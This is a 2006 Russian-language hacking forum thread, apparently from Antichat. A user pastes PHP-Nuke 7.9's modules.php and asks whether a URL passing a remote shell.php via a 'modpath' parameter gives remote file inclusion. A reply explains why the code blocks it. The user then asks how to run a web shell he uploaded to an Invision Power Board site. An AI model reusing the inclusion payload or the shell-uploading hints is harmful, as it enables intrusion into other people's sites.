 |
PhP Nuke 7.9 Include Bug Help |
27.08.2006, 13:39
|
|
Новичок
Регистрация: 28.09.2005
Сообщений: 29
С нами:
10850088
Репутация:
0
|
|
PhP Nuke 7.9 Include Bug Help
Код:
<?php
/************************************************************************/
/* PHP-NUKE: Web Portal System */
/* =========================== */
/* */
/* Copyright (c) 2005 by Francisco Burzi */
/* http://phpnuke.org */
/* */
/* This program is free software. You can redistribute it and/or modify */
/* it under the terms of the GNU General Public License as published by */
/* the Free Software Foundation; either version 2 of the License. */
/************************************************************************/
define('MODULE_FILE', true);
require_once("mainfile.php");
$module = 1;
$name = $_GET['name'];
$name = trim($name);
if (isset($name)) {
if (eregi("http\:\/\/", $name)) {
die("Hi and Bye");
}
$modstring = strtolower($_SERVER['QUERY_STRING']);
if (stripos_clone($modstring,"&user=") AND ($name=="Private_Messages" || $name=="Forums" || $name=="Members_List")) header("Location: index.php");
global $nukeuser, $db, $prefix;
$nukeuser = base64_decode($user);
$nukeuser = addslashes($nukeuser);
$result = $db->sql_query("SELECT active, view FROM ".$prefix."_modules WHERE title='$name'");
$row = $db->sql_fetchrow($result);
$mod_active = intval($row['active']);
$view = intval($row['view']);
if (($mod_active == 1) OR ($mod_active == 0 AND is_admin($admin))) {
if (!isset($mop)) { $mop="modload"; }
if (!isset($file)) { $file="index"; }
if (ereg("\.\.",$name) || ereg("\.\.",$file) || ereg("\.\.",$mop)) {
echo "You are so cool...";
} else {
$ThemeSel = get_theme();
if (file_exists("themes/$ThemeSel/modules/$name/".$file.".php")) {
$modpath = "themes/$ThemeSel/";
} else {
$modpath = "";
}
if ($view == 0) {
$modpath .= "modules/$name/".$file.".php";
if (file_exists($modpath)) {
include($modpath);
} else {
die ("Sorry, such file doesn't exist...");
}
} else if ($view == 1 AND (is_user($user) AND is_group($user, $name)) OR is_admin($admin)) {
$modpath .= "modules/$name/".$file.".php";
if (file_exists($modpath)) {
include($modpath);
} else {
die ("Sorry, such file doesn't exist...");
}
} elseif ($view == 1 AND !is_user($user) AND !is_admin($admin)) {
$pagetitle = "- "._ACCESSDENIED."";
include("header.php");
title("$sitename: "._ACCESSDENIED."");
OpenTable();
echo "<center><b>"._RESTRICTEDAREA."</b><br><br>"
.""._MODULEUSERS."";
$result2 = $db->sql_query("SELECT mod_group FROM ".$prefix."_modules WHERE title='$name'");
$row2 = $db->sql_fetchrow($result2);
if ($row2[mod_group] != 0) {
$result3 = $db->sql_query("SELECT name FROM ".$prefix."_groups WHERE id='$row2[mod_group]'");
$row3 = $db->sql_fetchrow($result3);
echo ""._ADDITIONALYGRP.": <b>$row3[name]</b><br><br>";
}
echo ""._GOBACK."";
CloseTable();
include("footer.php");
die();
} else if ($view == 2 AND is_admin($admin)) {
$modpath .= "modules/$name/".$file.".php";
if (file_exists($modpath)) {
include($modpath);
} else {
die ("Sorry, such file doesn't exist...");
}
} elseif ($view == 2 AND !is_admin($admin)) {
$pagetitle = "- "._ACCESSDENIED."";
include("header.php");
title("$sitename: "._ACCESSDENIED."");
OpenTable();
echo "<center><b>"._RESTRICTEDAREA."</b><br><br>"
.""._MODULESADMINS.""
.""._GOBACK."";
CloseTable();
include("footer.php");
die();
} else if ($view == 3 AND paid()) {
$modpath .= "modules/$name/$file.php";
if (file_exists($modpath)) {
include($modpath);
} else {
die ("Sorry, such file doesn't exist...");
}
} else {
$pagetitle = "- "._ACCESSDENIED."";
include("header.php");
title("$sitename: "._ACCESSDENIED."");
OpenTable();
echo "<center><b>"._RESTRICTEDAREA."</b><br><br>"
.""._MODULESSUBSCRIBER."";
if ($subscription_url != "") {
echo "<br>"._SUBHERE."";
}
echo "<br><br>"._GOBACK."";
CloseTable();
include("footer.php");
die();
}
}
} else {
include("header.php");
OpenTable();
echo "<center>"._MODULENOTACTIVE."<br><br>"
.""._GOBACK."</center>";
CloseTable();
include("footer.php");
}
} else {
die ("Sorry, you can't access this file directly...");
ia xachu zadat adin vapros eta ne include bug ?
Код:
include("header.php");
Код:
$modpath .= "modules/$name/".$file.".php
a esli ia takoi zapros dam satu
http://phpnke.site/modules.php?modpath=http://site/shell.php
on doljen rabotat takim metodam da ? |
|
|
27.08.2006, 14:06
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
$name = $_GET['name'];
$name = trim($name);
if (isset($name)) {
if (eregi("http\:\/\/", $name)) {
die("Hi and Bye");
}
$modpath .= "modules/$name/".$file.".php
if (file_exists($modpath))
ибо ничего не выйдет, все защищено. тебе даже предупреждей не удастся вызвать.
трим вырезает null char, http:// исключен т.к. modules/. Вот такие пироги.
|
|
|
|
29.08.2006, 11:57
|
|
Новичок
Регистрация: 28.09.2005
Сообщений: 29
С нами:
10850088
Репутация:
0
|
|
da shas ia ponial shto on zashishon
|
|
|
|
29.08.2006, 12:02
|
|
Новичок
Регистрация: 28.09.2005
Сообщений: 29
С нами:
10850088
Репутация:
0
|
|
slushai bratuxa i xachu zadat isho adin vapros
ti je znaish Invision Power Board on kak ia ponial failav katorix ne kanchaiutca jpg,gif, it tak dali nu faili katorie ne kartinki ix akanchanii pereviozit v .ipb
mne est dostup v failam uploads i ia naxadu toto fail no ne magu ivo uzat ia zalil shell no on perevadil ivo .ipb akanchioni fail, shto mne delat ? ia i cmd.txt ne magu uzat
|
|
|
|
29.08.2006, 19:53
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами:
10946149
Репутация:
116
|
|
Шелл можно только из админки залить!!!!
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books
|
PSalm69 |
Избранное |
273 |
13.02.2016 01:24 |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
